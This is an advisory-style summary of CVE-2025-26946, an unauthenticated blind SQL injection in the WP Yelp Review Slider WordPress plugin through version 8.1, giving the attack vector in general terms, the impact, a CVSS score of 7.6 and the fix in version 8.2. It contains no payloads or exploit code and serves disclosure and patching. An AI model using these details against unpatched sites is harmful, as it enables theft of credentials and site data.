CVE-2025-26946

Vulnerability

Overview

CVE-2025-26946 describes a blind SQL injection vulnerability in the WP Yelp Review Slider plugin for WordPress, versions 8.1 and earlier. The root cause is improper neutralization of special elements used in an SQL command, which enables an attacker to inject malicious SQL queries through the plugin's input handling [1].

Attack

Vector

The vulnerability is exploitable without authentication, making it accessible to any remote attacker. By crafting a specially submitted request (likely through a vulnerable parameter in the plugin's slider or review interface), an adversary can perform blind SQL injection, inferring database values through true/false responses or timing delays. The attack surface is broad because the plugin is widely installed on WordPress sites, and no prior login is required [1].

Impact

Successful exploitation allows an attacker to directly interact with the underlying WordPress database. This includes the ability to extract sensitive information such as user credentials, session tokens, and other site data. The CVSS v3.1 base score of 7.6 (High) reflects the potential for significant confidentiality impact and the ease of remote exploitation without privileges [1].

Mitigation

The plugin vendor has released version 8.2, which addresses the vulnerability by properly sanitizing user inputs. Users are strongly advised to update immediately. For Patchstack subscribers, auto-updates can be enabled for vulnerable plugins. If an update is not possible, site administrators should consult their hosting provider for alternative protective measures, though patching is the definitive solution [1].